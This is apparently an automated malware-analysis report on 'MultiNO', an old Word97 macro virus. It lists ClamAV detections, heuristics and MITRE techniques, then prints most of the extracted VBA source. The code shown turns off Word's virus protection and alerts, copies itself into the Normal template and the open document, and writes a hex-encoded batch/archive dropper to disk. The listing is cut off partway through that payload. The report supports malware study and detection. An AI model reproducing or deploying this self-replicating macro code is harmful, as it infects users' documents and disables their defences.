Risk Score: 360 (MALICIOUS)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1505.003 Server Software Component: Visual Basic for Applications
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document containing VBA macros, identified by ClamAV as 'Doc.Trojan.Multino-4'. The AutoClose macro exports its own VBA component ("MultiNO") to 'c:\logov.sys', imports that file into the Normal template and the active document wherever the component is not already present, and then writes a hex-encoded payload to 'c:\dropper.scr', suggesting an intent to establish persistence or to download and execute a second-stage payload. The use of VBA macros and the 'Shell()' function corresponds to the 'Visual Basic' technique.
Heuristics (7)
- ClamAV: Doc.Trojan.Multino-4 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Multino-4
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 38055 bytes |

SHA-256: 83cf03e46429f10f9d2540b2d902aec18c6c932cb4401fd9902f17469ee2f491
Detection: ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "MultiNO"
Sub AutoClose()
' MultiNO (Word97 part) '
' 1st BAT/Word97 virus! '
' ----- by FRiZER ----- '
On Error GoTo sys_exp
With Application
.DisplayAlerts = wdAlertsNone
.EnableCancelKey = wdCancelDisabled
.ScreenUpdating = False
End With
ShowVisualBasicEditor = False
Open "c:\logov.sys" For Input As 1
Close 1
GoTo skip_exp
sys_exp:
Application.VBE.ActiveVBProject.VBComponents("MultiNO").Export "c:\logov.sys"
skip_exp:
On Error GoTo complete
If ActiveDocument = "" Then GoTo complete
With Options
.VirusProtection = False
.SaveNormalPrompt = False
.ConfirmConversions = False
End With
ActiveDocument.ReadOnlyRecommended = False
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "MultiNO" Then nt = True
Next i
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(i).Name = "MultiNO" Then ad = True
Next i
If ad = False Then
ActiveDocument.VBProject.VBComponents.Import ("c:\logov.sys")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End If
If nt = False Then NormalTemplate.VBProject.VBComponents.Import ("c:\logov.sys")
Open "c:\dropper.scr" For Output As 1
Print #1, "N dropper.bat"
Print #1, "e0100 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A"
Print #1, "e0110 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A"
Print #1, "e0120 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 40 65"
Print #1, "e0130 63 68 6F 20 6F 66 66 0D 0A 73 65 74 20 76 3D 25"
Print #1, "e0140 30 0D 0A 69 66 20 6E 6F 74 20 65 78 69 73 74 20"
Print #1, "e0150 25 76 25 20 73 65 74 20 76 3D 25 76 25 2E 62 61"
Print #1, "e0160 74 0D 0A 61 72 6A 20 65 20 2D 79 20 25 76 25 3E"
Print #1, "e0170 6E 75 6C 0D 0A 63 61 6C 6C 20 5F 6D 75 6C 74 69"
Print #1, "e0180 6E 6F 2E 62 61 74 0D 0A 73 65 74 20 76 3D 0D 0A"
Print #1, "e0190 64 65 6C 20 5F 2A 2E 2A 3E 6E 75 6C 1A 60 EA 2C"
Print #1, "e01A0 00 1E 04 01 00 10 00 02 F1 F1 76 6F 27 00 00 00"
Print #1, "e01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5F"
Print #1, "e01C0 4D 55 4C 54 49 4E 4F 2E 41 52 4A 00 00 56 07 9B"
Print #1, "e01D0 B5 00 00 60 EA 2C 00 1E 04 01 00 10 01 00 F1 A0"
Print #1, "e01E0 69 6D 25 DD 00 00 00 8C 01 00 00 28 AB F0 FF 00"
Print #1, "e01F0 00 20 00 00 00 5F 4D 41 4B 45 44 52 50 2E 42 41"
Print #1, "e0200 54 00 00 7E 2F 2A CA 00 00 00 D7 5A 97 AD B5 0D"
Print #1, "e0210 E7 A1 7B FE 60 DC 3A 85 DA BC 94 5A A0 86 E3 45"
Print #1, "e0220 07 96 84 25 92 48 C4 BA 7E 32 7E 0B 51 1F 1B 76"
Print #1, "e0230 D5 BB 37 2A 40 01 A4 9F 72 91 E8 20 2B 5C F3 45"
Print #1, "e0240 44 0F EC EF AE DF 28 0B 20 7F BA AD F0 6A 20 31"
Print #1, "e0250 DF 87 8A D6 D4 2A 79 9A B0 70 90 2B E1 B1 20 D2"
Print #1, "e0260 FD 36 EA A7 50 30 48 40 DB CD 40 BF 00 36 E9 5E"
Print #1, "e0270 4D 70 D2 91 C5 17 99 1E 05 27 86 BC 2C 74 AF CA"
Print #1, "e0280 9B 8C 5E 30 E8 AE DB C5 83 DB 4C 70 8F F4 66 BB"
Print #1, "e0290 80 CF BE 4C 6B A3 4D C7 2A 39 4D 9E 1E B8 C6 71"
Print #1, "e02A0 EF 53 56 CD 81 D5 56 DD B6 72 41 14 43 F0 CF 6B"
Print #1, "e02B0 3F C5 4A AE 93 3A 4B F5 E6 83 9A D4 EE 7C F3 16"
Print #1, "e02C0 0F 50 66 17 D2 DA E4 86 8A F4 7E A8 39 73 EB F2"
Print #1, "e02D0 12 E3 C6 8C D0 D0 6F 71 82 54 E4 F0 27 2F CF E7"
Print #1, "e02E0 87 E7 8F 93 59 94 60 EA 2C 00 1E 04 01 00 10 01"
Print #1, "e02F0 00 F1 A0 69 6D 25 30 02 00 00 0B 05 00 00 61 30"
Print #1, "e0300 1E 9A 00 00 20 00 00 00 5F 4D 55 4C 54 49 4E 4F"
Print #1, "e0310 2E 42 41 53 00 00 BB CC 0A 2F 00 00 02 0E 62 97"
Print #1, "e0320 B2 26 E4 B8 E8 39 FF AD C0 8A 12 F5 1C 2A 54 26"
Print #1, "e0330 07 2C E6 89 4B CC 18 D6 05 28 43 5E DF C9 36 DD"
Print #1, "e0340 ED DD 37 7F CA BE 39 7F 7B 98 C8 58 C4 29 6D 2E"
Print #1, "e0350 1
```

... (truncated)